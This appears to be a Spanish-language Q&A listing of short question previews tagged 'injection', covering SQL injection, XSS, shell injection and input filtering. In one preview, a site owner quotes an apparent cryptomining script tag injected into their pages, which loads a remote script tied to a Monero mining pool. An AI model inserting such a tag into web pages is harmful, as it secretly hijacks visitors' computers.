Preguntas con etiqueta 'injection'

1
respuesta

¿Protocolos que son altamente resistentes a los ataques de inyección de código? [cerrado]

Después de leer sobre la seguridad basada en el lenguaje, parece que los protocolos que se definen utilizando gramáticas regulares o sin contexto son altamente resistentes a los ataques de inyección de código. ¿Hay algún buen protocolo de seg...
hecha 28.11.2013 - 18:31
1
respuesta

Javascript inyectado en mi documento HTML

Recientemente me di cuenta de que seguí JavaScript en varias de mis páginas (generalmente antes de cerrar la etiqueta del cuerpo): <script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cr...
hecha 08.06.2018 - 12:13
4
respuestas

¿Software para hackear web? [cerrado]

Quiero aprender inyección de sql, xss y otros ataques web. Soy nuevo en todo esto, sólo un principiante. Quiero saber qué software usar. ¿Puedo usar Windows para estos ataques y qué software utilizo? Llegué a conocer algunos programas como Nessu...
hecha 09.07.2014 - 18:44
4
respuestas

¿Es posible la inyección de código en algún idioma compilado o interpretado?

Me pregunto si es posible realizar una inyección de código en lenguajes compilados o interpretados. ¿Hay algún tipo de vector de ataque en esta área? La "inyección de código" de Whit me refiero a proporcionar un fragmento de código como entra...
hecha 15.12.2016 - 13:34
2
respuestas

Protección completa contra inyecciones de shell-script (como una “inyección Bash”): ¿es posible?

Supongamos que hay un sitio web creado con algunos FOSS CMS (como Drupal) y el directorio de los sitios web es propiedad y está agrupado por root (en lugar de www-data como es común en Apache en Nginx) y un amigo del propietario de...
hecha 03.01.2017 - 09:01
2
respuestas

¿Podemos considerar la inyección de etiquetas HTML sin atributos de evento como XSS?

Me pregunto si podemos considerar la inyección de etiquetas HTML como a , image , img , video , audio , marquee o iframe sin un atributo de evento como XSS ? Dado que no hay JavaScript involucrado y po...
hecha 17.06.2016 - 15:58
3
respuestas

¿Cómo se verifica que un script de Python es una función matemática pura?

Tengo un proyecto de Python que carga dinámicamente los scripts de Python desde un conjunto de directorios especificados y ejecuta una función esperada fuera de ellos (el marco espera un nombre de función que toma un cierto número de parámetros,...
hecha 28.07.2016 - 18:00
2
respuestas

¿Es posible filtrar la entrada del usuario en el lado del navegador para evitar la inyección?

He estado estudiando sobre problemas comunes relacionados con la inyección. ¿Es posible integrar algún mecanismo de filtrado para evitar la inyección en el lado del cliente? Por ejemplo, verificando la URL de la barra de direcciones para ver si...
hecha 10.06.2014 - 17:34
1
respuesta

¿Qué tipo de vulnerabilidad está realizando un atacante ejecutando el fragmento de código?

Acabo de comenzar con la codificación segura. ¿Alguien sabe qué tipo de vulnerabilidad está realizando un atacante ejecutando el fragmento de código?     
hecha 27.09.2018 - 10:22
1
respuesta

¿Es posible la inyección SQL en este script de registro de PHP? [cerrado]

Recientemente he creado un script de registro PHP para un sitio web en el que estamos trabajando un amigo y yo. He leído sobre los peligros de la inyección de MySQL y me preguntaba si mi código actual está protegido contra tales ataques, o si es...
hecha 24.12.2014 - 07:24